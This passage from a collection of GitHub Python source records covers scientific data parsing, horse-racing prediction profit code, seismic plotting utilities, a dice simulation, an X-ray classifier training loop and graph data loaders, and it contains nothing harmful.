pgui('last_q = ' + str(last_q))\n                log.error('last_q = ' + str(last_q))\n                return False\n\n        last_q = this_q\n        \n        count += 1\n        if DEBUG and count > (debug_number_of_files - 1):\n            log.debug('q_data TEST final q = ' + numpy.array2string(q_data[-1]))\n            log.debug('iq_data TEST final q = ' + numpy.array2string(iq_data[count-1,-1]))\n            log.debug('iq_error_data TEST final q = ' + numpy.array2string(iq_error_data[count-1,-1]))\n            evars.q_data = q_data\n            evars.iq_data = iq_data\n            evars.iq_error_data = iq_error_data\n            evars.number_iq_files = debug_number_of_files\n\n            return \n\n    evars.q_data = q_data\n    evars.iq_data = iq_data\n    evars.iq_error_data = iq_error_data\n\n    return \n","repo_name":"ehb54/nmrsuite","sub_path":"sassie_modifications/analyze/eros/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"6314733872","text":"from table_parser import HTMLTableParser\r\n\r\n\r\ndef simple(data):\r\n    results = []\r\n    p = HTMLTableParser()\r\n    p.feed(str(data))\r\n    for row in p.tables[0]:\r\n        detail = {\r\n            'level': row[0][0],\r\n            'bond': row[1][0],\r\n            'url': 'http://cccbdb.nist.gov/' + row[1][1] if len(row[1]) > 1 else ''\r\n        }\r\n        results.append(detail)\r\n    return results\r\n\r\n\r\ndef complex(data):\r\n    results = []\r\n    p = HTMLTableParser()\r\n    p.feed(str(data))\r\n    headers = p.tables[0][0]\r\n    # remove first 2 blank columns from header row\r\n    del headers[0]\r\n    del headers[0]\r\n    for row in p.tables[0]:\r\n        # only lines with a level\r\n        if len(row[0]) > 0:\r\n            level = row[0][0]\r\n            for index, bond in enumerate(row):\r\n                # only bonds that have content\r\n                if len(bond) == 2:\r\n                    detail = {\r\n                        'level': level,\r\n                        'basis': headers[index-1][0],\r\n                        'bond': bond[0],\r\n                        'url': 'http://cccbdb.nist.gov/' + bond[1]\r\n                    }\r\n                    results.append(detail)\r\n    return results\r\n","repo_name":"marcelo-mason/cccbdb-calculation-parser","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
+{"seq_id":"24036044893","text":"import random\nimport keras\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport sklearn.preprocessing as preprocessing\nimport matplotlib.pyplot as plt\n\nnp.random.seed(1)\nrandom.seed(2)\n\ndef how_many_do_we_win(y_pred_value,y_real_value,df):\n    \"\"\"\n    Return the total winnings and the mean of the winning odds\n    \"\"\"\n    win_amount = 0\n    List_odds = []\n    for i in range(len(y_pred_value)):\n        if y_pred_value[i] == y_real_value[i]:\n            val = df.win_odds[:][y_pred_value[i]+1].tolist()[i] #+1 because we need horse_no and not indices from a list\n            win_amount = win_amount + val\n            List_odds.append(val)\n    return win_amount, np.mean(List_odds)\n\ndef draw_evolution(df):\n    \"\"\"\n    Draw the evolution according to the date\n    \"\"\"\n    plt.figure(figsize=(10,10)).suptitle('Evolution of the profit with a $100 bet', fontsize=20)\n    plt.ylabel('profit', fontsize=18)\n    plt.xlabel('date', fontsize=16)\n    plt.xticks(rotation=90)\n    plt.plot(df.date, df.cumul_100)\n\ndef draw_evolution_race(df,model_name):\n    \"\"\"\n    Draw the evolution according to the number of races\n    \"\"\"\n    plt.figure(figsize=(10,10)).suptitle(f'Evolution of the profit with $100 for {model_name}', fontsize=20)\n    plt.ylabel('profit ($)', fontsize=18)\n    plt.xlabel('num bets', fontsize=16)\n    plt.xticks(rotation=0,fontsize=15)\n    
plt.yticks(rotation=0,fontsize=15)\n plt.plot(df.index, df.cumul_100) \n\ndef create_X_TEST(df_init):\n \"\"\"\n return a simplified dataframe used to retrieve win_odds and place_odds to calcul profit\n \"\"\"\n INDEX = ['race_id', 'date', 'race_no', 'venue', 'config', 'surface', 'distance', 'going', 'horse_ratings', 'prize', 'race_class']\n features = ['draw','place_odds','win_odds','result']\n return df_init[INDEX + features]\n\ndef create_x_and_y(df):\n \"\"\"\n function which return 2 dataframe for the features and labels used for trainning and testing\n \"\"\"\n data = df\n X = data[data.columns[:-14]] \n ss = preprocessing.StandardScaler()\n X = pd.DataFrame(ss.fit_transform(X),columns = X.columns)\n y = data[data.columns[-14:]].applymap(lambda x: 1.0 if x == 1 else 0.0) \n\n return X, y\n\ndef prepare_and_split_data_placed(X_train_init,X_test_init):\n \"\"\"\n this function do the data prepartion then split and give us the good datasets according to the months we are trainning\n \"\"\"\n X_train = remove_place_odds_non_available(X_train_init)\n X_test = remove_place_odds_non_available(X_test_init)\n\n X_train = hm_runners(X_train)\n X_test = hm_runners(X_test)\n\n X_train = create_label(X_train)\n X_test = create_label(X_test)\n\n cols_to_drop = ['race_id','race_no','hm_runners','date','won','place']\n X_tr = X_train.drop(cols_to_drop,axis=1,level=0)\n X_te = X_test.drop(cols_to_drop,axis=1,level=0)\n\n L = []\n for col in X_tr.columns.tolist():\n L.append(col[0])\n\n X_train, y_train = create_x_and_y(X_tr)\n print(\"shape of the x_train: \", X_train.shape)\n print(\"shape of the y_train: \", y_train.shape)\n \n if X_te.shape[0] == 0 :\n print(\"They are no values available\")\n return False\n else :\n X_test, y_test = create_x_and_y(X_te)\n print(\"shape of the X_test: \", X_test.shape)\n print(\"shape of the y_test: \", y_test.shape)\n\n #compute y_train_value : show the winner for each races\n y_test_value = y_test.values.tolist()\n y_test_value = np.array([np.argmax(t) for t in y_test_value])\n \n #compute y_test_value\n y_train_value = y_train.values.tolist()\n y_train_value = np.array([np.argmax(t) for t in y_train_value])\n\n return X_train, y_train, X_test, y_test, y_train_value, y_test_value, X_test_init\n\ndef remove_place_odds_non_available(df):\n \"\"\"\n This function return a df with only race where place odds are available for all horses\n \"\"\"\n df['test'] = np.where((df['draw'] == 0).astype(int).sum(axis=1) == (df['place_odds'] == 0).astype(int).sum(axis=1), 1,0) #1 is good and 0 need to be removed\n df = df[df['test']==1].copy()\n df.drop('test',axis=1, level = 0, inplace=True)\n return df\n\ndef hm_runners(df):\n \"\"\"\n return a df with a new columns with the number of placed horses needed\n \"\"\"\n nb_of_vacant_position = (df['draw'] == 0).astype(int).sum(axis=1)\n df.insert(loc = 0, column = 'hm_runners', value = 14 - nb_of_vacant_position)\n return df\n\ndef to_3_value(pred,real,df,match_race_id_from_indices):\n \"\"\"\n return 3 or 2 values for prediction and real value for placed horses depending on the numbers of runners\n \"\"\"\n #compute real values\n arr = real\n real = [ar.argsort()[-3:][::-1]+1 if np.count_nonzero(ar==0)==11 else ar.argsort()[-2:][::-1]+1 for ar in arr]\n\n #compute prediciton values\n result = []\n arr = pred\n for i in range(len(arr)):\n res = arr[i].argsort()[:][::-1]+1\n k = []\n val = 0\n for j in range(len(res)):\n val_seuil = len(real[i])\n\n if (get_place_odds(df,match_race_id_from_indices[i],res[j])!=0 and val < 
val_seuil) :\n                val = val + 1\n                k.append(res[j])\n\n        result.append(k)\n\n    return real, result\n\n\ndef get_place_odds(df,race_id,horse_no):\n    \"\"\"\n    Return the place_odds for a race_id and a horse_no\n    \"\"\"\n    A = df[df['race_id']==race_id]['place_odds'].iloc[0][horse_no-1]\n    # we could put a condition if the value does not exist and return 1 by default but we prefer to discard bets when this happens\n    return A \n\ndef compute_df_placed(pred,real,df,match_id):\n    \"\"\"\n    return a df with information to draw the evolution of our investment\n    \"\"\"\n    real, pred = to_3_value(pred,real,df,match_id)\n    L_odds = []\n    for i in range(len(real)):\n        L_odds.append([get_place_odds(df,match_id[i],real[i][j]) for j in range(len(real[i]))])\n\n    df_draw = pd.DataFrame(list(zip(pred,real)), columns=['pred','real']) \n    df_draw['place_odds_real'] = L_odds\n    df_draw['profit'] = df_draw.apply(list_to_odds,axis=1)\n    df_draw['cumul'] = df_draw['profit'].cumsum()\n    df_draw['cumul_100'] = df_draw['cumul'] + 100\n    return df_draw\n\ndef list_to_odds(x):\n    \"\"\"\n    return the amount of money we win according to the predictions, real values and place_odds\n    \"\"\"\n    tot = 0\n    list_pred = x.pred\n    list_real = x.real\n    place_odds_real = x.place_odds_real\n    for i in range(len(list_real)):\n        if list_real[i] in list_pred:\n            tot = tot + place_odds_real[i] - 1\n        else:\n            tot = tot - 1\n    return tot\n\ndef create_label(df_entry):\n    \"\"\"\n    return a df with labels at 1 or 0\n    \"\"\"\n    df = df_entry.copy()\n    df.loc[df.hm_runners>=7,'result'] = df[df.hm_runners>=7][df.columns[-14:]].applymap(lambda x: 1 if 0.5 < x < 3.5 else 0)\n    df.loc[df.hm_runners<7,'result'] = df[df.hm_runners<7][df.columns[-14:]].applymap(lambda x: 1 if 0.5 < x < 2.5 else 0)\n    return df\n\ndef function_less_place_odds(df):\n    \"\"\"\n    this function returns the mean of the two lowest non-zero place_odds of each race\n    \"\"\"\n    L = df.place_odds[:].values\n    M = []\n    for i in range(len(L)):\n        J = sorted(L[i][np.nonzero(L[i])])[:2]\n        if len(J)!=0:\n            M.append(np.mean(J))\n    return np.mean(M)\n\ndef compute_gain(y_test,y_pred,df,match_id):\n    \"\"\"\n    compute the gain and some other useful information\n    \"\"\"\n    good_guesses = 0\n    tot = 0\n    revenue = 0\n    real, pred = to_3_value(y_pred,y_test.values,df,match_id)\n    L = []\n    for i in range(len(y_test)):\n        \n        for j in range(len(pred[i])):\n            if pred[i][j] in real[i]:\n                good_guesses += 1\n                val = df.place_odds[:][pred[i][j]].tolist()[i]\n                L.append(val)\n                revenue = revenue + val\n\n        tot = tot + len(real[i])\n\n    return revenue, tot, good_guesses, np.mean(L)\n\ndef compute_df_placed_xgb(pred,real,df,match_id):\n    \"\"\"\n    return a df with information to draw the evolution of our investment\n    \"\"\"\n    L = []\n    for i in range(len(real)):\n        L.append([get_place_odds(df,match_id[i],real[i][j]) for j in range(len(real[i]))])\n\n    Z = pd.DataFrame(list(zip(pred,real)), columns=['pred','real']) \n    Z['place_odds_real'] = L\n    Z['profit'] = Z.apply(list_to_odds,axis=1)\n    Z['cumul'] = Z['profit'].cumsum()\n    Z['cumul_100'] = Z['cumul'] + 100\n    return Z\n\ndef change_shape(pred_bad_shape):\n    \"\"\"\n    change the shape of the predictions\n    \"\"\"\n    A = [pred_bad_shape[i][:,1] for i in range(14)]\n\n    return [np.array([A[i][j] for i in range(14)]) for j in range(len(A[0]))]\n\ndef mean_place_odds(X_test_init):\n    \"\"\"\n    function which returns the mean place odd over all races and all horses for this month\n    \"\"\"\n    list_place_odds = X_test_init.place_odds.values\n\n    non_null_place_odds = []\n\n    for L in list_place_odds:\n        for j in L:\n            if 
j!=0:\n non_null_place_odds.append(j)\n \n return np.mean(non_null_place_odds)\n\ndef ensemble_model_placed(pred_dl,pred_lgbm,coef_dl):\n \"\"\"\n Compute the ensemble result thanks to percentage prediciton \n \"\"\"\n new_pred = coef_dl*pred_dl + (1-coef_dl)*pred_lgbm\n return new_pred\n\ndef train_dl(num_neutron,batch_size,epoch,X_train,y_train,X_test,y_test):\n \"\"\"\n This function will allow us to train our deep learning model\n \"\"\"\n\n model = tf.keras.Sequential([\n tf.keras.layers.Dense(num_neutron, activation='relu', input_shape=(1618,)),\n tf.keras.layers.Dense(14, activation='softmax')\n ])\n\n model.compile(optimizer=tf.keras.optimizers.Adam(5e-04),\n loss=tf.keras.losses.CategoricalCrossentropy(),\n metrics=[tf.keras.metrics.Precision(name='precision')])\n\n dataset = tf.data.Dataset.from_tensor_slices((X_train.values, y_train.values))\n train_dataset = dataset.shuffle(len(X_train)).batch(batch_size)\n\n dataset = tf.data.Dataset.from_tensor_slices((X_test.values, y_test.values))\n validation_dataset = dataset.shuffle(len(X_test)).batch(batch_size)\n\n print(\"Start training..\\n\")\n history = model.fit(train_dataset, epochs=epoch, validation_data=validation_dataset)\n print(\"Done.\")\n return model\n\ndef compute_profil(month, X_train, y_train, X_test, y_test, y_train_value, y_test_value, X_test_init):\n \"\"\"\n Compute profit for all models (Deep Learning, LGBM, Ensemble model)\n \"\"\"\n \n X_TEST = create_X_TEST(X_test_init)\n \n match_race_id_from_indices = X_test_init.race_id.to_list()\n\n model = keras.models.load_model(f'model/placed_DL_{month}.h5')\n y_pred_dl = model.predict(X_test)\n\n revenue,hm_bet,good_guesses,mean_sucess_pred = compute_gain(y_test,y_pred_dl,X_TEST,match_race_id_from_indices)\n \n perc_dl = round((good_guesses / hm_bet) * 100,2)\n\n profit_DL = revenue-hm_bet \n\n filename = f'model/winner_lgbm_{month}'\n\n #load saved model\n lgbm = joblib.load(filename)\n \n y_pred_lgbm = lgbm.predict_proba(X_test)\n\n revenue,hm_bet,good_guesses,mean_sucess_pred = compute_gain(y_test,y_pred_lgbm,X_TEST,match_race_id_from_indices)\n \n perc_lgbm = round((good_guesses / hm_bet) * 100,2)\n\n profit_lgbm = revenue-hm_bet\n \n pred_proba_dl = model.predict_proba(X_test)\n pred_proba_lgbm = lgbm.predict_proba(X_test)\n \n pred_classes = ensemble_model_placed(pred_proba_dl,pred_proba_lgbm,0.3)\n\n revenue,hm_bet,good_guesses,mean_sucess_pred = compute_gain(y_test,pred_classes,X_TEST,match_race_id_from_indices)\n \n perc_conso = round((good_guesses / hm_bet) * 100,2)\n\n profil_conso = revenue-hm_bet \n\n return profit_DL, profit_lgbm, pred_proba_dl, pred_proba_lgbm, profil_conso,perc_dl,perc_lgbm,perc_conso, hm_bet\n","repo_name":"codeworks-data/mvp-horse-racing-prediction","sub_path":"placed/placed_functions.py","file_name":"placed_functions.py","file_ext":"py","file_size_in_byte":11749,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"13679840975","text":"import pandas as pd\nimport numpy as np\n\n\ndef load_dataset(filepath, samplesize=None, chunksize=None):\n \"\"\"Returns an iterator over chunks of a dataset of waveforms as pandas dataframes. Separator is ';'. Dataframe must be indexed by 'index'-column\".\n\n :param filepath: Path to file\n :type filepath: str\n :param samplesize: Sample size. if None, then all is loaded\n :type samplesize: int\n :param chunksize: Size of loaded chunks. 
if None, then all is loaded in one chunk\n :type chunksize: int\n :return: a pandas dataframe\n :rtype: pandas.DataFrame\n \"\"\"\n skip = None\n if samplesize is not None:\n import random\n row_count = sum(1 for line in open(filepath))-1\n skip = sorted(random.sample(range(1,row_count+1),row_count-samplesize))\n\n call = pd.read_csv(filepath,\n sep=\";\",\n index_col=\"index\",\n skiprows=skip,\n chunksize=chunksize)\n\n if chunksize is not None:\n for chunk in call:\n yield chunk\n else:\n yield call\n\n\ndef waveform2matrix(df, wv_cols=list(map(str, range(64)))):\n \"\"\"Takes a dataframe containing waveforms and returns a numpy\n matrix containing the waveforms.\n\n :param df: Dataframe containing waveforms\n :type df: pandas.DataFrame\n :param wv_cols: Column names of waveforms,\n defaults to list(map(str, range(64)))\n :type wv_cols: List, optional\n :return: a [#samples]x[#waveform_dimension]-matrix\n :rtype: np.ndarray\n \"\"\"\n # this matrix will make it easier to plot samples\n mat = np.zeros((df.shape[0], len(wv_cols)))\n for idx, col in enumerate(wv_cols):\n mat[:, idx] = df[col].values\n return mat\n","repo_name":"graps1/deepwaveform","sub_path":"deepwaveform/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18075578045","text":"from typing import List, Optional, Dict\n\nfrom PyQt5.QtWidgets import QFileDialog\nfrom bokeh.document import Document\nfrom bokeh.models import ColumnDataSource\n\nfrom bokeh_server.utils.SingletonMeta import SingletonMeta\n\n\nclass GodografType:\n Manual = \"Manual\"\n SemiAutomatic = \"Semi-automatic\"\n Automatic = \"Automatic\"\n Mer = \"MER\"\n Em = \"EM\"\n STA_LTA = \"STA/LTA\"\n\n\nclass GodografData:\n def __init__(self):\n self.points_x = []\n self.points_y = []\n self.colors = []\n\n\nclass Godograf:\n def __init__(self, name):\n self.is_active = True\n self.visible = True\n self.current_color = \"blue\"\n self._color_changed = False\n self.fixed = False\n self.name = name\n self.current_part: Optional[GodografData] = None\n\n def set_color_changed(self, value):\n self._color_changed = value\n\n def add_color(self, color):\n print(\"COLOR:\", color)\n self.current_part.colors.append(color)\n\n def add_coord_x(self, x):\n self.current_part.points_x.append(x)\n\n def add_coord_y(self, y):\n self.current_part.points_y.append(y)\n\n def is_visible(self):\n return self.visible\n\n def set_visible(self, value):\n self.visible = value\n\n @property\n def color_changed(self):\n return self._color_changed\n\n\nclass GodografSettings(metaclass=SingletonMeta):\n current_travels_name: None\n\n def __init__(self):\n self.is_control = False\n self.current_godograf: Optional[Godograf] = None\n self.current_index = 0\n self.all_godografs: Dict[str, Dict[str, ColumnDataSource]] = {}\n self.reset_points_x = False\n self.reset_points_y = False\n self.reset_points_color = False\n self.reset_points = False\n self.current_file_name = None\n self.current_travels_name = None\n self.energy_source: Dict[str, int] = {}\n self.docs: Dict[str, Document] = {}\n self.step = 5\n self.type = \"Manual\"\n self.files_is_open = False\n\n def get_is_control(self):\n return self.is_control\n\n def set_is_control(self, value=None):\n if value:\n self.is_control = value\n else:\n self.is_control = not self.is_control\n\n def create_new_godograf(self, f_name: str, g_name: str):\n godograf = Godograf(g_name)\n godograf_data = 
GodografData()\n        if f_name not in self.all_godografs:\n            self.all_godografs[f_name] = {}\n        self.all_godografs[f_name][g_name] = godograf\n        self.all_godografs[f_name][g_name].current_part = godograf_data\n        self.current_godograf = self.all_godografs[f_name][g_name]\n\n    def create_or_choise_part_godograf(self, f_name: str, name: str):\n\n        # if not self.current_godograf:\n        #     return\n        if f_name not in self.all_godografs:\n            self.all_godografs[f_name] = {}\n        if name not in self.all_godografs[f_name]:\n            godograf_data = GodografData()\n            self.all_godografs[f_name][name] = Godograf(name)\n            self.all_godografs[f_name][name].current_part = godograf_data\n            self.current_godograf = self.all_godografs[f_name][name]\n        else:\n            self.current_godograf = self.all_godografs[f_name][name]\n        if self.current_travels_name != name:\n            self.reset_points = True\n        self.current_travels_name = name\n\n    #\n\n    def save_godograf(self, godograf_name):\n        name = QFileDialog.getSaveFileName()\n        if name[0] != \"\":\n            file = open(name[0], \"w\")\n            for key, value in self.all_godografs.items():\n                if godograf_name in value:\n                    a = value[godograf_name]\n                    for i in zip(a.data[\"x\"], a.data[\"y\"]):\n                        file.write(str(self.energy_source[key]) + \", \" + str(i[0]) + \", \" + str(i[1]) + \"\\n\")\n\n            file.close()\n\n    def get_current_godograf(self):\n        return self.current_godograf\n\n    def set_current_godograf_color(self, new_color):\n        new_colors = []\n        # todo\n        if new_color != self.current_godograf.current_color:\n            for i in range(len(self.current_godograf.current_part.colors)):\n                new_colors.append(new_color)\n            self.current_godograf.current_part.colors = new_colors\n            self.current_godograf.current_color = new_color\n        #\n        # self.current_godograf.current_part.colors = new_colors\n        # self.current_godograf.current_part.current_color = new_color\n        # self.current_godograf.set_color_changed(True)\n\n    def get_current_godograf_color(self):\n        return self.current_godograf.current_part.colors\n\n    def color_was_changed(self):\n        return self.current_godograf.color_changed\n\n    def set_current_godograf(self, file_name: str, travels_name: str):\n\n        # self.create_or_choise_part_godograf(self.current_file_name, self.current_travels_name)\n        # self.create_or_choise_part_godograf(file_name, travels_name)\n        self.current_godograf = self.all_godografs[file_name][travels_name]\n        self.reset_points = True\n\n    def press_arrow_up(self):\n        new_points_y = []\n        for i in self.current_godograf.current_part.points_y:\n            new_points_y.append(i - self.step)\n        print(new_points_y)\n        self.current_godograf.current_part.points_y = new_points_y\n        self.reset_points_y = True\n\n    def press_arrow_down(self):\n        new_points_y = []\n        for i in self.current_godograf.current_part.points_y:\n            new_points_y.append(i + self.step)\n        print(new_points_y)\n        self.current_godograf.current_part.points_y = new_points_y\n        self.reset_points_y = True\n\n    def change_tab(self, file_name, travels_name):\n        # self.reset_points = True\n\n        self.create_or_choise_part_godograf(file_name, travels_name)\n        if self.current_godograf:\n            self.current_godograf.set_color_changed(True)\n","repo_name":"Kognor1/diplom_v_2","sub_path":"bokeh_server/RenderData/godografs/Godograf.py","file_name":"Godograf.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"27906836532","text":"from die import Die\nimport pygal\n\n# Create a D6 and a D10\ndie_1 = Die( )\ndie_2 = Die(10)\n\n# Roll the dice many times and store the results in a list\nresults = [ ]\nfor roll_num in range(50000):\n    result = 
die_1.roll( ) + die_2.roll( )\n    results.append(result)\n\n# Analyze the results\nfrequencies = [ ]\nmax_num = die_1.num_sides + die_2.num_sides\nfor value in range(2, max_num+1):\n    frequency = results.count(value)\n    frequencies.append(frequency)\n\n# Visualize the results\nhist = pygal.Bar( )\n\nhist.title = 'Results of rolling a D6 and a D10 50000 times'\nhist.x_labels = [x for x in range(2, max_num+1)]\n\nhist.x_title = 'Result'\nhist.y_title = 'Frequency of Result'\n\nhist.add('D6 + D10', frequencies)\nhist.render_to_file('D6_and_D10.svg')\n","repo_name":"joyDDT/python_code","sub_path":"py/Python_Crash_Course/project2/different_dice.py","file_name":"different_dice.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14280386169","text":"import json\n\n\nclass Robot:\n    def __init__(self, name, id, socket=None):\n        self.name = name\n        self.id = id\n        self.socket = socket\n\n    def dict(self):\n        return {\n            'name': self.name,\n            'id': self.id\n        }\n\n    @staticmethod\n    def parse(robot_json):\n        robot_obj = json.loads(robot_json)\n        return Robot(robot_obj['name'], robot_obj['id'])\n","repo_name":"eypiem/IoT-Robot-Server","sub_path":"models/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"38159244474","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom src.xray.entity.config_entity import TrainingConfig\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom torch.optim.lr_scheduler import StepLR\nfrom torchsummary import summary\nfrom src.xray.components import model \nfrom tqdm import tqdm\n\n\n\n# model_architecture = model().Net()\n# # To check whether cuda is available in the system or not \n# use_cuda = torch.cuda.is_available()\n# device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n# print(\"Available processor {}\".format(device))\n# model = model_architecture.to(device)\n# # To check the model summary\n# summary(model, input_size=(3, 224, 224))\n\n\nclass ModelTrainer:\n    def __init__(self, epoch, model, train_loader, test_loader, optimizer, device,config=TrainingConfig):\n        self.config = config\n        self.epoch = epoch\n        self.model = model\n        self.train_loader = train_loader\n        self.test_loader = test_loader\n        self.optimizer = optimizer\n        self.device = device\n\n    def train(self,):\n        \"\"\"\n        Description: To train the model \n        \n        input: model,device,train_loader,optimizer,epoch \n        \n        output: loss, batch id and accuracy\n        \"\"\"\n        self.model.train()\n        pbar = tqdm(self.train_loader)\n        correct = 0\n        processed = 0\n        for batch_idx, (data, target) in enumerate(pbar):\n            # get data\n            data, target = data.to(self.device), target.to(self.device)\n            # Initialization of gradient\n            self.optimizer.zero_grad()\n            # In PyTorch, gradients are accumulated over backward passes; that is useful for RNNs\n            # but generally not wanted for CNNs, so they are reset at every batch\n            ## prediction on data\n            y_pred = self.model(data)\n            # Calculating loss given the prediction\n            loss = F.nll_loss(y_pred, target)\n            # Backprop\n            loss.backward()\n            self.optimizer.step()\n            # get the index of the log-probability corresponding to the max value\n            pred = y_pred.argmax(dim=1, keepdim=True)\n            correct += pred.eq(target.view_as(pred)).sum().item()\n            processed += len(data)\n            pbar.set_description(desc= f'Loss={loss.item()} 
Batch_id={batch_idx} Accuracy={100*correct/processed:0.2f}')\n\n\n def test(self,):\n \"\"\"\n Description: To test the model\n \n input: model, self.device, test_loader\n \n output: average loss and accuracy\n \n \"\"\"\n self.model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in self.test_loader:\n data, target = data.to(self.device), target.to(self.device)\n output = self.model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n test_loss /= len(self.test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\\n'.format(\n test_loss, correct, len(self.test_loader.dataset),\n 100. * correct / len(self.test_loader.dataset)))\n\n def initiate_training(self):\n # Defining the params for training \n model = self.model.to(self.device)\n # optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.8)\n scheduler = StepLR(self.optimizer, step_size=6, gamma=0.5)\n # EPOCHS = 4\n # Training the model\n for epoch in range(self.epoch):\n print(\"EPOCH:\", epoch)\n self.train()\n scheduler.step()\n print('current Learning Rate: ', self.optimizer.state_dict()[\"param_groups\"][0][\"lr\"])\n self.test()\n #print(model.state_dict())\n\n torch.save(model.state_dict(),self.config.trained_model_path)\n ","repo_name":"jaydeepIneuron007/Lung_Xray_Classifier","sub_path":"src/xray/components/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37909507481","text":"import numpy as np\nimport pickle as pkl\nimport scipy.sparse as sp\nimport torch\n\n''' Fetch and preprocess dataset '''\ndef load_data(args):\n dataset = args.dataset\n metapaths = args.metapaths\n sc = args.sc\n data = pkl.load(open('data/{}.pkl'.format(dataset), \"rb\"))\n\n label = data['labels']\n N = label.shape[0]\n if args.incl_attr == 1:\n truefeatures = data['features'].astype(float)\n truefeatures = sp.lil_matrix(truefeatures)\n rownetworks = [data[\"layers\"][metapath] + np.eye(N) * sc for metapath in metapaths]\n rownetworks = [sp.csr_matrix(rownetwork) for rownetwork in rownetworks]\n idx_train = data[\"splits\"][\"-1\"]['train_idx'].ravel()\n idx_val = data[\"splits\"][\"-1\"]['val_idx'].ravel()\n idx_test = data[\"splits\"][\"-1\"]['test_idx'].ravel()\n\n truefeatures_list = []\n if args.incl_attr:\n for _ in range(len(rownetworks)):\n truefeatures_list.append(truefeatures)\n elif not args.incl_attr:\n truefeatures_list = rownetworks\n\n adj_list = list()\n for i in range(len(rownetworks)):\n row, col, data = list(), list(), list()\n row.extend(rownetworks[i].tocoo().row)\n col.extend(rownetworks[i].tocoo().col)\n data.extend(rownetworks[i].tocoo().data)\n assert len(row) == len(col) == len(data)\n c = torch.LongTensor(np.vstack((np.array(row), np.array(col))))\n adj_list.append(c)\n\n return rownetworks, adj_list, truefeatures_list, label, idx_train, idx_val, idx_test\n\n\n''' Get Semi-Supervised Cluster Similarity Kernel. 
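The kernel built below is WY.dot(WY.T), where WY holds the one-hot label rows
for training nodes and zeros everywhere else, so (assuming one-hot labels)
entry (i, j) is 1 exactly when nodes i and j are both training nodes with the
same label. A small sketch with made-up values, not taken from the data: for
labels [[1, 0], [1, 0], [0, 1]] and idx_train = [0, 2], WY is
[[1, 0], [0, 0], [0, 1]] and WY.dot(WY.T) is the 3 x 3 matrix with ones only
at (0, 0) and (2, 2).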
'''\ndef get_cluster_kernel(nb_nodes, nb_classes, idx_train, labels):\n    A = list() # List of SS-Cluster Kernels for each relation\n    WY = sp.lil_matrix(np.zeros((nb_nodes, nb_classes))) # W is a penalty matrix\n    WY[idx_train, :] = labels[idx_train, : ] # Filtering out test-label information\n    WYW = WY.dot(WY.transpose()) # Label similarity kernel based on train-points\n    A.append(torch.FloatTensor(WYW.todense()))\n\n    return A\n\n###############################################\n# This section of code adapted from tkipf/gcn #\n###############################################\ndef preprocess_features(features):\n    \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n    rowsum = np.array(features.sum(1))\n    with np.errstate(divide='ignore'):\n        r_inv = np.power(rowsum, -1).flatten()\n    r_inv[np.isinf(r_inv)] = 0.\n    r_inv[np.isnan(r_inv)] = 0.\n    r_mat_inv = sp.diags(r_inv)\n    features = r_mat_inv.dot(features)\n    return features.todense()\n\n\ndef normalize_adj(adj):\n    \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n    adj = sp.coo_matrix(adj)\n    rowsum = np.array(adj.sum(1))\n    with np.errstate(divide='ignore'):\n        d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n    d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n    d_inv_sqrt[np.isnan(d_inv_sqrt)] = 0.\n    d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n    # a = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)\n    a = adj.dot(d_mat_inv_sqrt)\n    a = d_mat_inv_sqrt.dot(a)\n    return a.tocoo()\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n    \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n    sparse_mx = sparse_mx.tocoo().astype(np.float32)\n    indices = torch.from_numpy(\n        np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n    values = torch.from_numpy(sparse_mx.data)\n    shape = torch.Size(sparse_mx.shape)\n    return torch.sparse.FloatTensor(indices, values, shape)\n\n","repo_name":"anasuamitra/ssdcm","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
